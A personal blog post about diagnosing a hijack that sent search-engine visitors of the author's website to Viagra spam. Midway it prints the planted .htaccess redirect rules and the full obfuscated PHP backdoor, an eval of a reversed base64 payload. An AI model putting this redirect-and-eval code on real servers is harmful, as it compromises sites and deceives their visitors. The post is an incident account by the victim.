investigating a hack

 Your leaking thatched hut during the restoration of a pre-Enlightenment state.

Hello, my name is Judas Gutenberg and this is my blaag (pronounced as you would the vomit noise "hyroop-bleuach").

[latest article]

Nov | December | Jan
2014 | 2015 | 2016
index of years

links

decay & ruin
Biosphere II
Chernobyl
dead malls
Detroit
Irving housing

got that wrong
Paleofuture.com

appropriate tech
Arduino μcontrollers
Backwoods Home
Fractal antenna

fun social media stuff

Like asecular.com
(nobody does!)

Like my brownhouse:

investigating a hack
Tuesday, December 1 2015

As you might recall, a couple weeks ago I complained about a mysterious browser hijacker that was replacing web pages on Asecular.com with ads for Cialis and other medications for the aging penis. At first it seemed like code that had burrowed itself into the Chrome installation, though I was never able to track it down. I was forced to run Spybot Search & Destroy and hope that one of the many things is found and destroyed with the hijacker. There was another, similar hijacker infecting Firefox at the time (it animated static images and turned them into advertisements), and that was easy to find and remove from the Firefox add-ons. But periodically I'd see evidence that there was a hijacker insinuated deep in Chrome. Today, though, it became obvious. Every page on Asecular.com had been turned into an ad for Viagra. (For some reason this ad featured two young-looking actors getting ready to get it on.) At first, though, this still seemed to only be a Chrome problem. And even then I could navigate to the Asecular.com pages if I had the direct URL. I only got redirected to the Viagra spam if I used the URL of the Google redirect delivered with a page of Google results. (Google doesn't produce direct links in such result pages; instead it produces a links to a Google-hosted redirect so that it can track which links are being clicked on.) And redirects delivered in Google Chrome didn't lead to spam when followed in Firefox. This made me think Firefox wasn't affected. But then I did a Google search for an Asecular.com page on a Linux laptop, clicked on a link on a Google result page, and again saw Viagra spam. This was my first indication that the problem wasn't in Chrome or on my computer at all. I soon confirmed that this problem also happened in Firefox if I did a Google search for an Asecular.com page in Firefox and then clicked on one of the results. Could the problem be my DNS server? But the problem persisted even when I changed that. The only thing left in the house that could be harboring the hijacker was the DSL router, but the problem persisted even after swapping that out. Now I knew the problem was upstream from the house. My first suspect was Verizon, an evil corporation with a long history of laziness, malevolence, and sociopathy. It wouldn't surprise me if they'd compiled a list of obscure websites (like Asecular.com) and sold browser hijacks for their Google search results to shit-bag companies purporting to sell Viagra and Dr. Oz's fat-burning tonics. Verizon already sells search results on pages they deliver in place of domain-not-found messages (if you use their DNS server). With this in mind, I posted the following into the forum at DSL Reports:

Perhaps other Verizon DSL users can help me investigate this. I started noticing that some web pages I administer had been replaced by ads for medications such as Viagra and Cialis. At first I assumed the problem was malware on my computer, but when I couldn't find any, I began to check those same pages from other computers in my house, and they also appeared hijacked, but only when reached via clicking on a link in a page of Google results. These results appear hijacked from Chromebook and iPad as well, which indicates that the hijacking code is not on the client computers. I have two different DSL routers, and the hijacking appears when using either one, even when the router is only connected to the DSL line and the only attached computer is one running Google Chrome over a WiFi connection. This suggests the hijacking is happening upstream from my house, somewhere in Verizon's network. I'd be curious if others are seeing this too, since it could affect many people if it is upstream from me. Here's a test: do a Google search for "redneckistan" and click on the link for "Redneckistan Homepage - Asecular.com" -- if you see a Viagra ad, you're a victim of the hijack. (If you go directly to http://www.asecular.com/ran/terms/redneckistan.htm you will not see the hijack.) Thanks for any help on this matter!

Before long, others had helpfully posted that they were also getting the Viagra ads, and some of these people weren't on the Verizon network. Now it was looking like the problem might actually be in my web hosting environment, or perhaps the hosting company, Godaddy.com (which is every bit as sociopathic as Verizon). I would have been delighted to pin this on Godaddy.com, but none of my tests indicated anything odd about their DNS (name) servers. So then I took a hard look at my website. And this was how I came to find that someone had placed an .htaccess file in its webroot. The effect of an .htaccess file is to catch web requests before PHP or most of Apache gets ahold of them. Using the arcane syntax of .htaccess, a skilled user (or hacker) can hide or redirect URLs according to a tight set of rules. This is what the .htaccess file I found looked like:

RewriteEngine On RewriteCond %{ENV:REDIRECT_STATUS} 200 RewriteRule ^ - [L] RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR] RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing) RewriteRule ^(.*)$ indigent-grievers.php?$1 [L]

This would have had the effect of redirecting to a file called indigent-grievers.php if any incoming web request had been referred by any of the major search engines. Sure enough, the file indigent-grievers.php was also in the root of the server, though its specific behavior was impossible to ascertain:

<?php $diaddo="c".chr(114).chr(101)."a".chr(116)."\x65"."\x5f".chr(102)."u"."n"."c"."\x74"."\x69"."\x6f".chr(110);$mpjqbp = $diaddo('$a',strrev(';)a$(lave')); $mpjqbp(strrev(';))"=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"(edoced_46esab(lave'));?>

Its affect was to deliver ads for penis pills, but what else might it be doing? I certainly can't tell you. But the upshot of all this is that someone managed to get those two files onto my server on November 1st, and they've presumably been sending my search engine traffic to penis pill purveyors for a whole month. It's surprising that when a hacker gained access to my site that this was all they could think to do with it. But perhaps that's the only or best way to monetize such an obscure domain; it's not like I have passwords or credit card numbers stored there (or child pornography with which to blackmail me). This is the first evidence I've ever had of any part of my computer-resident life being hacked, and yet the affect was minor and easily-reversed. It's not as if my password is easy to guess, but for the past 19 years I've been using old-school FTP to upload files, and I know that you're really not supposed to do that because FTP passwords are sent over the internet in plaintext.

So I went to Godaddy.com in hopes of changing my password and migrating to SFTP, but their website is just as much of a mess as it has ever been, with loud clashing colors trying to sell stuff and anything one would ever want to do hidden away. Eventually I found a way to transfer my site to a server providing SSH, but then pulling the trigger on that locked me out of making any changes to the password until the process concluded. According to the nice young man I talked to at Godaddy tech support, that could take 24 hours. In the meantime, I just have to hope that either my hacker has forgotten about my website or never really had that much access to begin with.

For linking purposes this article's URL is:
http://asecular.com/blog.php?151201

feedback
previous | next